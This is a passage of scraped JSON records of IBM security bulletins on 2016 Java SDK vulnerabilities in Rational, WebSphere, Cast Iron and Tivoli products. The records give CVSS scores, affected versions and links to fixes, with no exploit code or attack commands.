"cvelist": ["CVE-2016-0695", "CVE-2016-3425", "CVE-2016-3427"], "modified": "2018-06-18T00:28:27", "id": "3C67CAAA7F30B6812F7E9BDAD360C818D08704D065BB87A725B5C752904516A9", "href": "https://www.ibm.com/support/pages/node/696371", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:38:07", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDKs Java\u2122 Technology Edition, Versions 7 and 8 that is used by IBM Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect Real Time. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-0363_](<https://vulners.com/cve/CVE-2016-0363>)** \nDESCRIPTION:** IBM SDK, Java Technology Edition contains a vulnerability in the IBM ORB implementation that may allow untrusted code running under a security manager to elevate its privileges. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112016_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112016>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-0376_](<https://vulners.com/cve/CVE-2016-0376>)** \nDESCRIPTION:** A vulnerability in IBM Java SDK could allow a remote attacker to execute arbitrary code on the system. This vulnerability allows code running under a security manager to escalate its privileges by modifying or removing the security manager. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112152_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112152>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java, SE Java SE Embedded and JRockit related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n## Affected Products and Versions\n\nIBM Rational Software Architect 8.5.x through 9.5.0.1\n\n## Remediation/Fixes\n\nUpdate the IBM SDK, Java Technology Edition of the product to address this vulnerability: \n \n\n\n**Product**| **VRMF**| **Remediation/First Fix** \n---|---|--- \nRational Software Architect (RSA) \n| 9.5 to 9.5.0.1| [IBM Java SDK/JRE 8 SR3 IFixes](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect&release=9.5.0&platform=All&function=fixId&fixids=Rational-RSA-Java8SR3-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect for WebSphere Software (RSA4WS)| 9.5 to 9.5.0.1| [IBM Java SDK/JRE 8 SR3 IFixes](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+for+WebSphere+Software&release=9.5.0&platform=All&function=fixId&fixids=Rational-RSA4WS-Java8SR3-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect RealTime (RSART)| 9.5| [IBM Java SDK/JRE 8 SR3 IFixes](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+RealTime+Edition&release=9.5.0&platform=All&function=fixId&fixids=Rational-RSART-Java8SR3-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect (RSA) \n| 8.5 to 8.5.5.4 \n9.0 to 9.0.0.1 \n9.1 to 9.1.2.1| [IBM Java SDK/JRE 7 SR9 FP40 IFixes](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect&release=8.5.0&platform=All&function=fixId&fixids=Rational-RSA-Java7SR9FP40-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect for WebSphere Software (RSA4WS)| 8.5 to 8.5.5.4 \n9.0 to 9.0.0.1 \n9.1 to 9.1.2.1| [IBM Java SDK/JRE 7 SR9 FP40 IFixes](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+for+WebSphere+Software&release=8.5.0&platform=All&function=fixId&fixids=Rational-RSA4WS-Java7SR9FP40-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect RealTime (RSART)| 8.5 to 8.5.1 \n9.0 to 9.0.0.1 \n9.1 to 9.1.2| [IBM Java SDK/JRE 7 SR9 FP40 IFixes](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+RealTime+Edition&release=8.5.0&platform=All&function=fixId&fixids=Rational-RSART-Java7SR9FP40-ifix&includeSupersedes=0&source=fc>) \n \n**Installation Instructions:** \n \nFor instructions on installing this update using Installation Manager, review the topic [Updating Installed Product Packages](<http://www.ibm.com/support/knowledgecenter/SS8PJ7_9.1.0/com.ibm.xtools.installation.rsaws.doc/topics/t_update.html>) in the IBM Knowledge Center. \n \n**Instructions to download and install the update from the compressed files:** \n\n\n 1. Download the update files from Fix Central by following the link listed in the download table above \n \n\n 2. Extract the compressed files in an appropriate directory. \n \nFor example, choose to extract to `C:\\temp\\update \n \n`\n 3. Start IBM Installation Manager. \n \n\n 4. On the Start page of Installation Manager, click **File > Preferences**, and then click **Repositories**. The Repositories page opens. \n \n\n 5. On the Repositories page, click **Add Repository**. \n \n\n 6. In the Add repository window, browse to or enter the file path to the repository.config file, which is located in the directory where you extracted the compressed files and then click OK. \n \nFor example, enter `C:\\temp\\update\\repository.config`. \n \n\n 7. Click **OK** to close the Preference page. \n \n\n 8. Install the update as described in the the topic [Updating Installed Product Packages](<http://www.ibm.com/support/knowledgecenter/SS8PJ7_9.1.0/com.ibm.xtools.installation.rsaws.doc/topics/t_update.html>) in the IBM Knowledge Center for your product and version.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-10T15:49:00", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in the IBM Java SDK affects IBM Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect Real Time (CVE-2016-0363, CVE-2016-0376, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0363", "CVE-2016-0376", "CVE-2016-3427"], "modified": "2020-09-10T15:49:00", "id": "BC89FD795C8D2727ED36F68D3C0CB562583E29BA6F46C7C0230E9FDCF5110D99", "href": "https://www.ibm.com/support/pages/node/278993", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:51:26", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environments Java\u2122 Technology Edition, Version 6, that is used by WebSphere Dashboard Framework. These issues were disclosed as part of the IBM Java SDK updates in April 2016. The vulnerabilities may affect some configurations of products bundled with WebSphere Dashboard Framework.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java, SE Java SE Embedded and JRockit related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/112459> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [CVE-2016-3426](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/112457> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [CVE-2016-0264](<https://vulners.com/cve/CVE-2016-0264>)** \nDESCRIPTION:** A buffer overflow vulnerability in the IBM JVM facilitates arbitrary code execution under certain limited circumstances. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/110867> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n \n--- \n \n## Affected Products and Versions\n\nWebSphere Dashboard Framework 7.0.1\n\n## Remediation/Fixes\n\nObtain the JRE appropriate for your product from [Fix Central](<http://www-933.ibm.com/support/fixcentral/>)[](<http://www-933.ibm.com/support/fixcentral/>). Note however that these updated JREs are only appropriate for customers that have installed the copy of Eclipse, WASCE, or Liberty bundled with WebSphere Dashboard Framework. \n \nWebSphere Dashboard Framework (WDF) on Windows: \n \n[LO88931](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Dashboard+Framework&fixids=LO88931_WDF701&source=SAR>) \\- Java 6 for all versions of WDF 7.0.1 \n \nWebSphere Dashboard Framework (WDF) on Linux: \n \n[LO88932](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Dashboard+Framework&fixids=LO88932_WDF701&source=SAR>) \\- Java 6 for all versions of WDF 7.0.1 \n \nFor previous versions of WebSphere Dashboard Framework IBM recommends upgrading to a fixed, supported version/release/platform of the product.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:00:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 6, affects: WebSphere Dashboard Framework (CVE-2016-3427, CVE-2016-3426, CVE-2016-0264)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0264", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T20:00:51", "id": "3352ECB45B78D0B42C884136DC8EEAB3DFA07BBC5F0040DCA087FF7BC4435447", "href": "https://www.ibm.com/support/pages/node/278155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:18", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Versions 6 and 7 that are used by IBM WebSphere MQ. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\nIf you run your own Java code using the IBM Java Runtime delivered with this product, you should evaluate your code to determine whether the complete list of vulnerabilities are applicable to your code. For a complete list of vulnerabilities please refer to the Reference section for more information. \n \n**CVEID:** [_CVE-2016-0264_](<https://vulners.com/cve/CVE-2016-0264>)** \n****DESCRIPTION:** A buffer overflow vulnerability in the IBM JVM facilitates arbitrary code execution under certain limited circumstances. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110867_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110867>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM SDK, Java Technology Edition, Version 7R1, provided by IBM WebSphere MQ 8.0.0.4 and earlier on Windows, Linux and AIX \nIBM SDK, Java Technology Edition, Version 7, provided by IBM WebSphere MQ 8.0.0.4 and earlier on Solaris and HP-UX \nIBM SDK, Java Technology Edition, Version 6, provided by IBM WebSphere MQ 7.5.0.6, IBM WebSphere MQ 7.1.0.7 and earlier on all platforms (except IBM i and z/OS)\n\n## Remediation/Fixes\n\n**_IBM WebSphere MQ 8.0_**\n\nApply fix pack [8.0.0.5](<http://www-01.ibm.com/support/docview.wss?uid=swg27043086>) when available, in the interim apply [ifix IT14908](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+MQ&release=8.0&platform=All&function=aparId&apars=IT14908>)\n\n**_IBM WebSphere MQ 7.5_**\n\nApply fix pack [7.5.0.7](<http://www-01.ibm.com/support/docview.wss?uid=swg27038184>) when available, in the interim apply [ifix IT14908](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+MQ&release=7.5&platform=All&function=aparId&apars=IT14908>)\n\n**_IBM WebSphere MQ 7.1_**\n\nApply fix pack [7.1.0.8](<http://www-01.ibm.com/support/docview.wss?uid=swg27024302>) when available, in the interim apply [ifix IT14908](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+MQ&release=7.1&platform=All&function=aparId&apars=IT14908>)\n\n_For unsupported versions of IBM WebSphere MQ, __I__BM recommends upgrading to a fixed, supported version of the product._\n\n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:34", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM WebSphere MQ (CVE-2016-0264, CVE-2016-3426 and CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0264", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:34", "id": "64DD46BD08D899DF176194BC3B565D436438971A0D7BEC33DB449C0B7DBDB5B6", "href": "https://www.ibm.com/support/pages/node/278209", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:40:01", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition, Version JAVA 6 SR16 FP20, JAVA 7 SR9 FP30 that is used by WebSphere Cast Iron Cloud Integration. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n** ** \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3449_](<https://vulners.com/cve/CVE-2016-3449>)** \nDESCRIPTION:** An unspecified vulnerability related to the Deployment component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 7.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112453_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112453>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:H/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \n\n\n## Affected Products and Versions\n\nThis vulnerability affects all versions of the product \nWebSphere Cast Iron v 7.5.x, \nWebSphere Cast Iron v 7.0.0.x, \nWebSphere Cast Iron v 6.4.0.x \nWebSphere Cast Iron v 6.3.0.x \nWebSphere Cast Iron v 6.1.0.x\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nCast Iron Appliance| 7.5.*| LI79045| [7.5.1.0-CUMUIFIX-002](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.5.1.0&platform=All&function=fixId&fixids=7.5.1.0-WS-WCI-20160704-1028_H11_64-CUMUIFIX-002.scrypt2,7.5.1.0-WS-WCI-20160704-1028_H11_64-CUMUIFIX-002.vcrypt2,7.5.1.0-WS-WCI-20160704-1028_H11_64-CUMUIFIX-002.32bit.sc-linux,7.5.1.0-WS-WCI-20160704-1028_H11_64-CUMUIFIX-002.sc-linux,7.5.1.0-WS-WCI-20160704-1028_H11_64-CUMUIFIX-002.32bit.sc-win,7.5.1.0-WS-WCI-20160704-1028_H11_64-CUMUIFIX-002.sc-win,7.5.1.0-WS-WCI-20160704-0921_H11_64-CUMUIFIX-002.32bit.studio,7.5.1.0-WS-WCI-20160704-0921_H11_64-CUMUIFIX-002.studio,7.5.1.0-WS-WCI-20160704-1028_H11_64-CUMUIFIX-002.docker&includeSupersedes=0>) \nCast Iron Appliance| 7.0.*| LI79045| [7.0.0.2-CUMUIFIX-030](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.0.0.2&platform=All&function=fixId&fixids=7.0.0.2-WS-WCI-20160711-1236_H11_64-CUMUIFIX-030.scrypt2,7.0.0.2-WS-WCI-20160711-1236_H11_64-CUMUIFIX-030.vcrypt2,7.0.0.2-WS-WCI-20160711-1236_H11_64-CUMUIFIX-030.32bit.sc-linux,7.0.0.2-WS-WCI-20160711-1236_H11_64-CUMUIFIX-030.32bit.sc-win,7.0.0.2-WS-WCI-20160711-1236_H11_64-CUMUIFIX-030.sc-linux,7.0.0.2-WS-WCI-20160711-1236_H11_64-CUMUIFIX-030.sc-win,7.0.0.2-WS-WCI-20160711-0824_H11_64-CUMUIFIX-030.32bit.studio,7.0.0.2-WS-WCI-20160711-0824_H11_64-CUMUIFIX-030.studio&includeSupersedes=0>) \nCast Iron Appliance| 6.4.0.x| LI79045| [6.4.0.1-CUMUIFIX-039](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=6.4.0.1&platform=All&function=fixId&fixids=6.4.0.1-WS-WCI-20160713-1157_H5-CUMUIFIX-039.scrypt2,6.4.0.1-WS-WCI-20160713-1157_H5-CUMUIFIX-039.vcrypt2,6.4.0.1-WS-WCI-20160707-1600_H5-CUMUIFIX-034.studio&includeSupersedes=0>) \nCast Iron Appliance| 6.3.0.x| LI79045| [6.3.0.2-CUMUIFIX-022](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=6.3.0.2&platform=All&function=fixId&fixids=6.3.0.2-WS-WCI-20160721-1915_H3-CUMUIFIX-022.scrypt2,6.3.0.2-WS-WCI-20160721-1915_H3-CUMUIFIX-022.vcrypt2,6.3.0.2-WS-WCI-20160721-1735_H5-CUMUIFIX-022.studio&includeSupersedes=0>) \nCast Iron Appliance| 6.1.0.x| LI79045| [6.1.0.15-CUMUIFIX-029](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=6.1.0.15&platform=All&function=fixId&fixids=6.1.0.15-WS-WCI-20160721-1224_H3-CUMUIFIX-029.scrypt2,6.1.0.15-WS-WCI-20160721-1224_H3-CUMUIFIX-029.vcrypt2,6.1.0.15-WS-WCI-20160721-1106_H5-CUMUIFIX-029.studio&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-11-18T13:57:34", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Cast Iron Cloud integration (CVE-2016-3427, CVE-2016-3449, CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427", "CVE-2016-3449"], "modified": "2019-11-18T13:57:34", "id": "39386BB32C57BB1B41EB54F0E3BBD3ECD3E1A6BE6C64795EC5DC2969E728D80F", "href": "https://www.ibm.com/support/pages/node/547695", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:35", "description": "## Summary\n\nThe following security issues have been identified in WebSphere Application Server included as part of IBM Tivoli Monitoring (ITM) portal server. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \n**CVEID:** [_CVE-2016-0306_](<https://vulners.com/cve/CVE-2016-0306>)** \nDESCRIPTION:** IBM WebSphere Application Server could provide weaker than expected security, caused by the improper TLS configuration. A remote attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111423_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111423>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID:** [_CVE-2015-0254_](<https://vulners.com/cve/CVE-2015-0254>)** \nDESCRIPTION:** Apache Standard Taglibs could allow a remote attacker to execute arbitrary code on the system, caused by an XML External Entity Injection (XXE) error when processing XML data. By sending specially-crafted XML data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/101550_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/101550>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n## Affected Products and Versions\n\nIBM Tivoli Monitoring versions 6.2.3 through 6.3.0 FP6 - Tivoli Enterprise Portal Server (TEPS) all CVEs above. \nIBM Tivoli Monitoring versions 6.2.2 - Tivoli Enterprise Portal Server (TEPS) for CVE-2015-0254.\n\n## Remediation/Fixes\n\n**\n\n## _Portal Server-_\n\n**embedded WebSphere Application Server \n \n\n\n**_Fix_**| **_VMRF_**| **_Remediation/First Fix_** \n---|---|--- \n6.X.X-TIV-ITM_EWAS_ALL-8.00.11.03| 6.3.0.x| <http://www.ibm.com/support/docview.wss?uid=swg24042343> \nContains a patch for the embedded WebSphere Application Server (eWAS) 8.0 Fix Pack 11 plus Interim Fix Block 3. \nTechnote| 6.2.3.x| __<http://www.ibm.com/support/docview.wss?uid=swg21633720>__ \nContains information about installing the embedded WebSphere Application Server (eWAS) patches for IBM Tivoli Monitoring 6.23. The link gives instructions to install** **eWAS 7.0 Fix Pack 39 (7.0.0.39) and Interim Fix block 3 (or later). \nTechnote| 6.2.2.x| [_http://www.ibm.com/support/docview.wss?uid=swg21509259_](<http://www.ibm.com/support/docview.wss?uid=swg21509259>) \nContains information about installing the embedded WebSphere Application Server (eWAS) patches for IBM Tivoli Monitoring 6.22. The link gives instructions are to install** **eWAS 6.1 Fix Pack 47 (6.1.0.47) and Interim Fix block 4 (or later) \n \nYou should verify applying this fix does not cause any compatibility issues. \n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", 